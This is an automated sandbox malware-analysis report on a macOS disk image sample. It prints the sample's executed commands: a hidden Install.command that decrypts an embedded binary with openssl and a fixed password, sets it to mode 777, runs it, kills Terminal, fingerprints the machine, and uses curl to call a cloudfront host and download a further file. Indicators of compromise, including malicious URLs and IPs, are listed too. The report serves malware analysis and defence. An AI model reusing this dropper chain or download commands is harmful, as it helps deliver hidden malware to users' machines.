Loading ...

Play interactive tourEdit tour

Analysis Report G0Sr0fA5cv.dmg

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:102473
Start date:14.05.2020
Start time:11:20:22
Joe Sandbox Product:Cloud
Overall analysis duration:0h 8m 44s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:G0Sr0fA5cv.dmg
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, Mojave (Java JDK 11.0.4, Adobe Reader 2019.012.20034, Flash 32.0.0.223)
Detection:MAL
Classification:mal56.evad.macDMG@0/10@1/0
Warnings:
Show All
  • Excluded IPs from analysis (whitelisted): 17.253.54.253, 17.253.54.251, 17.253.108.125, 17.253.54.125, 17.253.108.253
  • Excluded domains from analysis (whitelisted): time-macos.apple.com, time-osx.g.aaplimg.com

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold560 - 100Report FP / FNfalsemalicious

Classification Spiderchart

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand-Line Interface11Hidden Files and Directories1Port MonitorsHidden Files and Directories1Credential DumpingVirtualization/Sandbox Evasion1Remote File Copy3Data from Local SystemData Encrypted11Standard Non-Application Layer Protocol3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaScripting11Port MonitorsAccessibility FeaturesVirtualization/Sandbox Evasion1Network SniffingSecurity Software Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Application Layer Protocol13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesPath InterceptionScripting11Input CaptureSystem Information Discovery71Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationRemote File Copy3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

Signature Overview

Click to jump to signature section


Cryptography:

barindex
Encrypts data with the "openssl" commandShow sources
Source: /bin/bash (PID: 18843)Openssl executable with 'enc' command: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -A -base64 -pass pass:2P1zsqQJump to behavior
Source: /bin/bash (PID: 18849)Openssl executable with 'enc' command: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -A -base64 -k 2P1zsqQ -in /Volumes/Install/.hidden/2P1zsqQ -out /tmp/oVlTmrVXYMfG/Qqsz1P2Jump to behavior
Executes the "openssl" command used for cryptographic operationsShow sources
Source: /bin/bash (PID: 18843)Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -A -base64 -pass pass:2P1zsqQJump to behavior
Source: /bin/bash (PID: 18849)Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -A -base64 -k 2P1zsqQ -in /Volumes/Install/.hidden/2P1zsqQ -out /tmp/oVlTmrVXYMfG/Qqsz1P2Jump to behavior

Networking:

barindex
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=0&gs=1 HTTP/1.1Host: d1wkiebwu8q7qk.cloudfront.netUser-Agent: curl/7.54.0Accept: */*
Source: global trafficHTTP traffic detected: GET /slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=1&gs=1 HTTP/1.1Host: d1wkiebwu8q7qk.cloudfront.netUser-Agent: curl/7.54.0Accept: */*
Source: global trafficHTTP traffic detected: GET /sd/?c=ImdybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&o=10.14.4&b=9806121775&gs=1 HTTP/1.0Host: d1wkiebwu8q7qk.cloudfront.netUser-Agent: curl/7.54.0Accept: */*
Source: global trafficHTTP traffic detected: GET /slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=3&gs=1 HTTP/1.1Host: d1wkiebwu8q7qk.cloudfront.netUser-Agent: curl/7.54.0Accept: */*
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: d1wkiebwu8q7qk.cloudfront.net
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1245Connection: closeCache-Control: no-cache, no-storePragma: no-cacheExpires: -1Server: Microsoft-IIS/7.5Access-Control-Allow-Origin: *X-AspNet-Version: 4.0.30319p3p: CP="CAO PSA OUR"Date: Thu, 14 May 2020 09:21:12 GMTX-Cache: Error from cloudfrontVia: 1.1 6c9a2d99a25484f38efa27d58a726b2d.cloudfront.net (CloudFront)X-Amz-Cf-Pop: FRA2-C2X-Amz-Cf-Id: QTqhiTeBI0MnpH6TE-ieuK0urxyObER7GaCgBzr4TxQ9ixi25rXZbg==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69
Urls found in memory or binary dataShow sources
Source: G0Sr0fA5cv.dmgString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal56.evad.macDMG@0/10@1/0

Persistence and Installation Behavior:

barindex
Executes hidden filesShow sources
Source: /bin/bash (PID: 18828)File in hidden directory executed: /Volumes/Install/.hidden/Install.command /Volumes/Install/.hidden/Install.commandJump to behavior
Sets full permissions to files and/or directoriesShow sources
Source: /bin/bash (PID: 18852)Chmod executable with 777: /bin/chmod -> chmod 777 /tmp/oVlTmrVXYMfG/Qqsz1P2Jump to behavior
Terminates several processes with shell command 'killall'Show sources
Source: /bin/bash (PID: 18845)Killall command executed: killall TerminalJump to behavior
Executes commands using a shell command-line interpreterShow sources
Source: /usr/bin/nohup (PID: 18844)Shell command executed: /bin/bash -c eval '$(echo 'openssl enc -aes-256-cbc -d -A -base64 -k \'$archive\' -in \'$appDir/$archive\' -out \'$tmpDir/$binFile\' xattr -c \'$tmpDir/\'* chmod 777 \'$tmpDir/$binFile\' \'$tmpDir/$binFile\' && rm -rf $tmpDir')'Jump to behavior
Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853)Shell command executed: sh -c defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersionJump to behavior
Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853)Shell command executed: sh -c system_profiler SPHardwareDataType | awk '/UUID/ { print $3 }'Jump to behavior
Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853)Shell command executed: sh -c for FILE in /Volumes/Install/.hidden/*.command do echo '${FILE}' break doneJump to behavior
Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853)Shell command executed: sh -c hdiutil info -plist | perl -0777pe 's|<data>\s*(.*?)\s*</data>|<string>$1</string>|gs' | plutil -convert json -r -o - -- -Jump to behavior
Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853)Shell command executed: sh -c curl -L 'http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=0&gs=1' > /dev/null 2>&1Jump to behavior
Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853)Shell command executed: sh -c curl -L 'http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=1&gs=1' > /dev/null 2>&1Jump to behavior
Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853)Shell command executed: sh -c curl -f0L -o /tmp/22EE15D2-4BC7-410C-BECA-0B2C62E78E2C/670A0417-65B8-493A-8E2A-3A956DAF169C 'http://d1wkiebwu8q7qk.cloudfront.net/sd/?c=ImdybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&o=10.14.4&b=9806121775&gs=1' > /dev/null 2>&1Jump to behavior
Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853)Shell command executed: sh -c curl -L 'http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=3&gs=1' > /dev/null 2>&1Jump to behavior
Executes the "chmod" command used to modify permissionsShow sources
Source: /bin/bash (PID: 18852)Chmod executable: /bin/chmod -> chmod 777 /tmp/oVlTmrVXYMfG/Qqsz1P2Jump to behavior
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)Show sources
Source: /bin/sh (PID: 18865)Curl executable: /usr/bin/curl -> curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=0&gs=1Jump to behavior
Source: /bin/sh (PID: 18867)Curl executable: /usr/bin/curl -> curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=1&gs=1Jump to behavior
Source: /bin/sh (PID: 18869)Curl executable: /usr/bin/curl -> curl -f0L -o /tmp/22EE15D2-4BC7-410C-BECA-0B2C62E78E2C/670A0417-65B8-493A-8E2A-3A956DAF169C http://d1wkiebwu8q7qk.cloudfront.net/sd/?c=ImdybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&o=10.14.4&b=9806121775&gs=1Jump to behavior
Source: /bin/sh (PID: 18871)Curl executable: /usr/bin/curl -> curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=3&gs=1Jump to behavior
Executes the "grep" command used to find patterns in files or piped streamsShow sources
Source: /bin/bash (PID: 18835)Grep executable: /usr/bin/grep -> grep -Ev \.(command)$Jump to behavior
Executes the "mkdir" command used to create foldersShow sources
Source: /bin/bash (PID: 18825)Mkdir executable: /bin/mkdir -> mkdir -m 700 -p /Users/ben/.bash_sessionsJump to behavior
Executes the "mktemp" command used to create a temporary unique file nameShow sources
Source: /bin/bash (PID: 18832)Mktemp executable: /usr/bin/mktemp -> mktemp -d /tmp/XXXXXXXXXXXXJump to behavior
Executes the "nohup" (no hangup) command used to avoid background terminal process from being killedShow sources
Source: /bin/bash (PID: 18844)Nohup executable: /usr/bin/nohup -> nohup /bin/bash -c eval '$(echo 'openssl enc -aes-256-cbc -d -A -base64 -k \'$archive\' -in \'$appDir/$archive\' -out \'$tmpDir/$binFile\' xattr -c \'$tmpDir/\'* chmod 777 \'$tmpDir/$binFile\' \'$tmpDir/$binFile\' && rm -rf $tmpDir')'Jump to behavior
Executes the "touch" command used to create files or modify time stampsShow sources
Source: /bin/bash (PID: 18827)Touch executable: /usr/bin/touch -> /usr/bin/touch /Users/ben/.bash_sessions/6191FB1D-2813-41DB-BF02-7C8C726DDB8A.historynewJump to behavior
Many shell processes execute programs via execve syscall (might be indicative for malicious behavior)Show sources
Source: /bin/sh (PID: 18854)Shell process: defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersionJump to behavior
Source: /bin/sh (PID: 18856)Shell process: system_profiler SPHardwareDataTypeJump to behavior
Source: /bin/sh (PID: 18857)Shell process: awk /UUID/ { print $3 }Jump to behavior
Source: /bin/sh (PID: 18861)Shell process: hdiutil info -plistJump to behavior
Source: /bin/sh (PID: 18862)Shell process: perl -0777pe s|<data>\s*(.*?)\s*</data>|<string>$1</string>|gsJump to behavior
Source: /bin/sh (PID: 18863)Shell process: plutil -convert json -r -o - -- -Jump to behavior
Source: /bin/sh (PID: 18865)Shell process: curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=0&gs=1Jump to behavior
Source: /bin/sh (PID: 18867)Shell process: curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=1&gs=1Jump to behavior
Source: /bin/sh (PID: 18869)Shell process: curl -f0L -o /tmp/22EE15D2-4BC7-410C-BECA-0B2C62E78E2C/670A0417-65B8-493A-8E2A-3A956DAF169C http://d1wkiebwu8q7qk.cloudfront.net/sd/?c=ImdybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&o=10.14.4&b=9806121775&gs=1Jump to behavior
Source: /bin/sh (PID: 18871)Shell process: curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=3&gs=1Jump to behavior
Queries for attached disk images with shell command 'hdiutil'Show sources
Source: /bin/sh (PID: 18861)Hdiutil command executed: hdiutil info -plistJump to behavior
Writes 64-bit Mach-O files to diskShow sources
Source: /usr/bin/openssl (PID: 18849)File written: /private/tmp/oVlTmrVXYMfG/Qqsz1P2Jump to dropped file
Writes Mach-O files to the tmp directoryShow sources
Source: /usr/bin/openssl (PID: 18849)64-bit Mach-O written to tmp path: /private/tmp/oVlTmrVXYMfG/Qqsz1P2Jump to dropped file
Executes the "awk" command used to scan for patterns (typically in standard output)Show sources
Source: /bin/sh (PID: 18857)Awk executable: /usr/bin/awk -> awk /UUID/ { print $3 }Jump to behavior
Reads data from the local random generatorShow sources
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 18851)Random device file read: /dev/urandomJump to behavior
Source: /usr/bin/perl5.18 (PID: 18862)Random device file read: /dev/urandomJump to behavior
Uses the Python frameworkShow sources
Source: /usr/bin/xattr (PID: 18851)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior

Malware Analysis System Evasion:

barindex
Reads the sysctl hardware model value (might be used for detecting VM presence)Show sources
Source: /usr/sbin/system_profiler (PID: 18858)Sysctl read request: hw.model (6.2)Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the macOS product versionShow sources
Source: /bin/sh (PID: 18854)Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersionJump to behavior
Reads hardware related sysctl valuesShow sources
Source: /usr/sbin/system_profiler (PID: 18858)Sysctl read request: hw.cpu_freq (6.15)Jump to behavior
Source: /usr/sbin/system_profiler (PID: 18858)Sysctl read request: hw.memsize (6.24)Jump to behavior
Reads the systems OS release and/or typeShow sources
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 18851)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 18851)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Reads the systems hostnameShow sources
Source: /bin/bash (PID: 18822)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /Volumes/Install/.hidden/Install.command (PID: 18828)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/bash (PID: 18844)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 18851)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 18854)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 18855)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 18859)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 18860)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 18864)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 18866)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 18868)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 18870)Sysctl requested: kern.hostname (1.10)Jump to behavior
Reads the system or server version plist fileShow sources
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 18851)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 18851)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Executes the "defaults" command used to read or modify user specific settingsShow sources
Source: /bin/sh (PID: 18854)Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersionJump to behavior

Stealing of Sensitive Information:

barindex
Executes the "system_profiler" command used to collect detailed system hardware and software informationShow sources
Source: /bin/sh (PID: 18856)System_profiler executable: /usr/sbin/system_profiler system_profiler SPHardwareDataTypeJump to behavior
Source: /usr/sbin/system_profiler (PID: 18856)System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel fullJump to behavior

Malware Configuration

No configs have been found


Runtime Messages

Command:open "/Volumes/Install/Install" --args
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 102473 Sample: G0Sr0fA5cv.dmg Startdate: 14/05/2020 Architecture: MAC Score: 56 92 d1wkiebwu8q7qk.cloudfront.net 13.225.73.108, 49313, 49314, 49315 unknown United States 2->92 12 Terminal login 2->12         started        process3 process4 14 login bash 12->14         started        process5 16 bash Install.command 14->16         started        19 bash 1 14->19         started        21 bash 14->21         started        23 2 other processes 14->23 signatures6 94 Executes hidden files 16->94 25 bash nohup bash 16->25         started        27 bash 16->27         started        29 bash killall 16->29         started        38 4 other processes 16->38 32 bash 19->32         started        34 bash path_helper 21->34         started        36 bash touch 1 23->36         started        process7 signatures8 40 bash Qqsz1P2 25->40         started        42 bash openssl 1 25->42         started        46 bash chmod 25->46         started        56 2 other processes 25->56 48 bash openssl 27->48         started        50 bash 27->50         started        100 Terminates several processes with shell command 'killall' 29->100 52 bash date 32->52         started        54 bash 38->54         started        58 6 other processes 38->58 process9 file10 60 sh 40->60         started        62 sh 40->62         started        64 sh 40->64         started        68 5 other processes 40->68 90 /private/tmp/oVlTmrVXYMfG/Qqsz1P2, Mach-O 42->90 dropped 96 Encrypts data with the "openssl" command 42->96 98 Sets full permissions to files and/or directories 46->98 66 bash dirname 54->66         started        signatures11 process12 process13 70 sh perl perl5.18 60->70         started        72 sh hdiutil 60->72         started        74 sh plutil 60->74         started        76 sh system_profiler 62->76         started        78 sh awk 62->78         started        80 sh curl 64->80         started        82 sh curl 68->82         started        84 sh curl 68->84         started        86 sh curl 68->86         started        process14 88 system_profiler 76->88         started       

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
13.225.73.108f_000418.exeGet hashmaliciousBrowse
    https://download.filezilla-project.org/client/FileZilla_3.47.2.1_win64_sponsored-setup.exeGet hashmaliciousBrowse

      Domains

      No context

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      unknown1735330053H319815.xlsGet hashmaliciousBrowse
      • 84.38.182.31
      salt-minionsGet hashmaliciousBrowse
      • 45.143.92.106
      adsasdasd.exeGet hashmaliciousBrowse
      • 127.0.0.1
      http://donnercompanies.net/security.phpGet hashmaliciousBrowse
      • 35.209.19.195
      Rla_5097.xlsGet hashmaliciousBrowse
      • 94.182.190.148
      Rla_5097.xlsGet hashmaliciousBrowse
      • 94.182.190.148
      Invoice-3681694.xlsGet hashmaliciousBrowse
      • 104.27.178.167
      Invoice-3681694.xlsGet hashmaliciousBrowse
      • 104.27.179.167
      2qPQnD5vHRDNTnC2KqNdtNXqcQrEJrNR.exeGet hashmaliciousBrowse
      • 23.95.85.123
      3hhWwWWq4x.dllGet hashmaliciousBrowse
      • 151.101.2.49
      https://www.alternativaprintjet.com.br/xyzito45/Uforaxsfx65gomn/xfschdonsingo/pishakayan/kp64a7jmihcs9wrn0oevzub1gf5xd32lqy8tonl02rximgeb1zf9tcv637qws5jp8ydhuk4a29j4zbutlhdkps38fn10ywo7mexcqv6g5rai?data=bWFudWVsLmFtYnJpekB2dWVsaW5nLmNvbQ==Get hashmaliciousBrowse
      • 177.10.165.125
      http://konnoryo.com/hta/?email=pavan.kumar@123test.comGet hashmaliciousBrowse
      • 202.254.238.5
      processhacker-2.39-setup.exeGet hashmaliciousBrowse
      • 162.243.25.33
      processhacker-2.39-setup.exeGet hashmaliciousBrowse
      • 162.243.25.33
      processhacker-2.39-setup.exeGet hashmaliciousBrowse
      • 162.243.25.33
      processhacker-2.39-setup.exeGet hashmaliciousBrowse
      • 162.243.25.33
      Locky.exeGet hashmaliciousBrowse
      • 86.104.134.144
      https://www.inter-health.com.au/wp-admin/css/index.php?email=mail@australianballet.com.au&data=02|01|mail@australianballet.com.au|2687c41444fd4d8d0a6508d7f7cf35e1|363ab79152b7474a91175bf36bde2b94|0|0|637250341744488099&sdata=6BQDV95b3b9Ro5HKEpjOLcgyx5i4cHADmo3Ctc6lmhU=&reserved=0Get hashmaliciousBrowse
      • 52.62.233.197
      Rha5238.xlsGet hashmaliciousBrowse
      • 94.182.190.148
      info-1205-3833314.xlsGet hashmaliciousBrowse
      • 104.27.178.167

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.